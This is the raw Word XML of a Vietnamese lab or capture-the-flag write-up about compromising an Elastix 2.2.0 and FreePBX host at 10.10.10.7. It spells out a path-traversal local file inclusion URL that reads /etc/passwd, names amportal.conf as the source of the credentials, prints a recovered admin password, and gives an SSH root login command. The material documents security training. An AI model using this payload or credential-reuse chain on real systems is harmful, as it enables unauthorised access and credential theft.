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16DB42" w14:textId="4E1B5BF2" w:rsidR="002F49FE" w:rsidRDefault="00277B78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B677887" wp14:editId="63F6C6E9">
            <wp:extent cx="5943600" cy="34880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32903" w14:textId="507F393B" w:rsidR="00321239" w:rsidRDefault="00321239"/>
    <w:p w14:paraId="3BC36ED1" w14:textId="06BBD8E0" w:rsidR="00321239" w:rsidRDefault="0032123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Phiên bản của TLS là 1.0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7BCB02" w14:textId="7B28106C" w:rsidR="00321239" w:rsidRPr="00321239" w:rsidRDefault="00321239">
      <w:pPr>
        <w:rPr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4B0AF373" wp14:editId="7E2A521F">
            <wp:extent cx="5435600" cy="2743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A80D" w14:textId="43D8F2E8" w:rsidR="00277B78" w:rsidRDefault="00277B78"/>
    <w:p w14:paraId="74EB959B" w14:textId="389D7D2D" w:rsidR="00277B78" w:rsidRDefault="005A5966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E9604EB" wp14:editId="0FEB766D">
            <wp:extent cx="4780344" cy="37226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77" t="15897" r="23062" b="17118"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4799505" cy="3737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80264" w14:textId="55E05E0A" w:rsidR="00321239" w:rsidRDefault="00321239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8489D1" w14:textId="4B8DD74E" w:rsidR="00321239" w:rsidRDefault="00377D1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Elastix là 1 máy chủ kết hợp nhiều chức năng khác nhau: IP PBX, email, IM, faxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89AF11" w14:textId="0C0DEFF4" w:rsidR="00377D1D" w:rsidRDefault="00377D1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBB0FC7" w14:textId="25ADC5D6" w:rsidR="00377D1D" w:rsidRDefault="0066558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tìm thấy khai thác có sẵn trên Elastix 2.2.0: Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B6DF9" w14:textId="7E06AB04" w:rsidR="0066558C" w:rsidRDefault="0066558C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DBB62E" w14:textId="663D01C4" w:rsidR="0066558C" w:rsidRPr="003800B5" w:rsidRDefault="00F7081D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003800B5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&amp;module=Accounts&amp;action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79B403" w14:textId="50FBC1F0" w:rsidR="00F7081D" w:rsidRDefault="00F7081D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654BEEC6" w14:textId="72713436" w:rsidR="00F7081D" w:rsidRDefault="00BE4B3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F543E9E" wp14:editId="308680B8">
            <wp:extent cx="5272405" cy="142468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08" r="11277" b="46933"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273350" cy="1424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CF7EB" w14:textId="4CEFFFC3" w:rsidR="003800B5" w:rsidRDefault="003800B5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E33AC64" w14:textId="66519C09" w:rsidR="003800B5" w:rsidRDefault="003800B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Máy chủ dùng FreePBX 2.5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC0326" w14:textId="0A71A8A4" w:rsidR="003800B5" w:rsidRDefault="003800B5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455F5B44" w14:textId="6C21F3F3" w:rsidR="003800B5" w:rsidRDefault="001B774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4221606" wp14:editId="42FFD883">
            <wp:extent cx="4738255" cy="39034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68" r="50041" b="18482"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4750485" cy="3913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8B3BA" w14:textId="1633C98E" w:rsidR="001B7746" w:rsidRDefault="001B7746">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC7FE1D" w14:textId="639F78A5" w:rsidR="001B7746" w:rsidRDefault="0090644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FreePBX là 1 giao diện người dùng mã nguồn mở hoạt động dựa trên web giúp bạn quản lý Asterisk, giọng nói qua IP (VoIP) và máy chủ điện thoại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E42C87" w14:textId="078D280A" w:rsidR="0090644C" w:rsidRDefault="0090644C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D45B7D0" w14:textId="38C70C93" w:rsidR="0090644C" w:rsidRDefault="00AD326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Asterisk là cơ sở </w:t>
      </w:r>
      <w:r w:rsidR="005E3A28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dữ liệu mysql của freepbx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A3290" w14:textId="1EB2A7AA" w:rsidR="005E3A28" w:rsidRDefault="005E3A28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB11300" w14:textId="54A5E28E" w:rsidR="00C84CA0" w:rsidRDefault="00C84C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Tập tin cấu hình của FreePBX </w:t>
      </w:r>
      <w:r w:rsidR="00F32A2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chứa cấu hình cơ sở dữ liệu là amportal.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BB43D" w14:textId="77777777" w:rsidR="00C84CA0" w:rsidRDefault="00C84CA0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC25536" w14:textId="7AF1367A" w:rsidR="00BE4B3A" w:rsidRPr="00493266" w:rsidRDefault="00F32A29">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493266">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00493266">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jEhdIekWmdjE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C3DECF" w14:textId="7F4761AB" w:rsidR="00F32A29" w:rsidRDefault="00F32A29">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707ADF58" w14:textId="42D5233C" w:rsidR="00F32A29" w:rsidRDefault="00F32A2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Ta có thể dùng tài khoản trên để đăng nhập FreePBX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B58400" w14:textId="1F95A741" w:rsidR="00493266" w:rsidRDefault="00493266">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9E2C5E" w14:textId="463CC8A6" w:rsidR="00F32A29" w:rsidRDefault="0049326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8419932" wp14:editId="3CFAB829">
            <wp:extent cx="5308270" cy="4115377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666" r="38662" b="8247"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5318886" cy="4123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9BD1F" w14:textId="77777777" w:rsidR="00BE4B3A" w:rsidRPr="00377D1D" w:rsidRDefault="00BE4B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E12377" w14:textId="7A201F9F" w:rsidR="00321239" w:rsidRPr="009F6527" w:rsidRDefault="009F65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không tìm được cách reverse shell trên FreePBX, nên thử kết nối ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B46CCC" w14:textId="08087D44" w:rsidR="00321239" w:rsidRDefault="007F2844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C1FE21" wp14:editId="66B198B8">
            <wp:extent cx="5943600" cy="819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8D3E5" w14:textId="77777777" w:rsidR="00B527DD" w:rsidRDefault="00B527DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9E98CB" w14:textId="2FE0D728" w:rsidR="007F2844" w:rsidRPr="001364DE" w:rsidRDefault="001364DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001364DE">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.10.10.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAAD58C" w14:textId="37CF48A8" w:rsidR="001364DE" w:rsidRDefault="001364DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262324FB" w14:textId="77777777" w:rsidR="001364DE" w:rsidRDefault="001364DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210CFBB0" w14:textId="0C41082E" w:rsidR="007F2844" w:rsidRDefault="001364DE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8319DE1" wp14:editId="59A4398F">
            <wp:extent cx="5943600" cy="284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8F66" w14:textId="760108DA" w:rsidR="001364DE" w:rsidRDefault="001364DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BD9A5E" w14:textId="52EE3341" w:rsidR="001364DE" w:rsidRDefault="009678A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F20590" wp14:editId="54516DCD">
            <wp:extent cx="3352800" cy="469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2007" w14:textId="52A67719" w:rsidR="009678A0" w:rsidRDefault="009678A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5733C9A8" w14:textId="3E5FD1F3" w:rsidR="009678A0" w:rsidRPr="00277B78" w:rsidRDefault="00A5179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063083" wp14:editId="5B22F474">
            <wp:extent cx="3365500" cy="419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78A0" w:rsidRPr="00277B7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17AC"/>
    <w:rsid w:val="001364DE"/>
    <w:rsid w:val="001B7746"/>
    <w:rsid w:val="002517AC"/>
    <w:rsid w:val="00277B78"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00321239"/>
    <w:rsid w:val="00377D1D"/>
    <w:rsid w:val="003800B5"/>
    <w:rsid w:val="00493266"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A5966"/>
    <w:rsid w:val="005E3A28"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="0066558C"/>
    <w:rsid w:val="007F2844"/>
    <w:rsid w:val="0090644C"/>
    <w:rsid w:val="00917258"/>
    <w:rsid w:val="009678A0"/>
    <w:rsid w:val="009F6527"/>
    <w:rsid w:val="00A51799"/>
    <w:rsid w:val="00AD3264"/>
    <w:rsid w:val="00B527DD"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE4B3A"/>
    <w:rsid w:val="00C84CA0"/>
    <w:rsid w:val="00F32A29"/>
    <w:rsid w:val="00F70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47D74E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06A130FA-034D-584D-955A-B4A80DB2E4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dcterms:created xsi:type="dcterms:W3CDTF">2024-08-02T08:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-02T09:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>